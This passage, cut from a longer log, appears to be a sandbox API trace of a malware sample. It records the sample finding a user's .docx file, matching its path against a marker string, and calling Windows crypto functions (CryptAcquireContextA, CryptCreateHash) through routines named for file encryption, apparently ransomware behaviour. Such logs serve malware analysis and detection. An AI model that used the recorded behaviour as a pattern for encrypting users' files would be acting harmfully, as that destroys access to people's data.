nFileSizeLow=0x4587, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0x90add8 [0171.740] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.740] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.740] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0x90add8 [0171.740] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.741] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Jws.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.744] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.744] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0171.744] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.744] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.744] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.744] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.744] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.744] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.744] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0x90ae18 [0171.745] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.745] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.745] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.745] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0171.745] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.745] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.745] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0171.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.746] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0171.747] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.747] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.747] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0171.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.748] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.748] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.748] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.748] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.748] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.748] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.748] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.748] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0171.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0171.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.749] CharUpperBuffW 